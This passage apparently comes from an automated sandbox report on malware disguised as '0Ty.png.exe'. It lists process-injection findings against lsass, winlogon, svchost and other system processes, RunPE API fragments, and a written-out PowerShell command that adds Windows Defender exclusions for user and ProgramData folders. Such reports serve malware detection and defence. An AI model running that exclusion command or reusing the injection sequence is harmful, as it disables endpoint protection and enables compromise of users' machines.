            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000002488060D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_000002488060D6D4
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000024880608528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,73_2_0000024880608528

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code contains process injector
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 24.2.dialer.exe.1400050b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 28.2.powershell.exe.1bff12d0000.12.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 38.3.weiuemyrzjra.exe.1e74f1434b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 62.2.dialer.exe.1400050b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            Source: 66.2.powershell.exe.28ba5b5ec68.15.raw.unpack, RunPE.cs.Net Code: Run contains injection code
            .NET source code references suspicious native API functions
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
            Source: 0.3.0Ty.png.exe.20c68e034b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Contains functionality to inject code into remote processes
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,68_2_0000000140002434
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612AC0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC612AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0AB2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 612D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AEDD2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992AC0
            Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D532AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 67D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B392AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBFD2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59042AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9E72AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 73162AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E862AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 473C2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F9D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83BC2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D3F72AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4152AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 644B2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ADB2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1992AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCE2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66942AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13EF2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29D02AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3402AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC692AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78972AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 64522AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0F2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B7F42AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 55FD2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C7042AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4202208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23B2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 48072AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90502AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F5C2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 111D2AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2572208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D62208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2932208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D02208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2752208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F32208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28B2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 942208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2332208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2922208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2392208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2742208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B52208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2552208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F32208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2602208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2502208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2822208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2512208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2222208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D92208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13A2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 722208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D62208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AA2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E02208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 882208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A62208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CD2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 692208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2842208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E32208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A22208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C32208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 912208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23A2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2312208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1502208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2902208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BB2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2132208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E52208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2612208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13B2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A22208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2362208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13E2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15B2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12D2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FE2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1482208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BC2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F52208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EF2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 902208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26E2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 972208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 722208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23F2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 672208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D72208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2972208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2302208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 842208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FD2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2092208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2202208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A22208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A22208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E02208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26C2208
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6442AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 89942AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB472AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9702AC0
            Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9732AC0
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29D00000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3400000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2538D0F0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 194B7F40000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27555FD0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 2DFC7040000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 4200000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 29A023B0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A648070000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E990500000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1887F5C0000 value starts with: 4D5A
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 219111D0000 value starts with: 4D5A
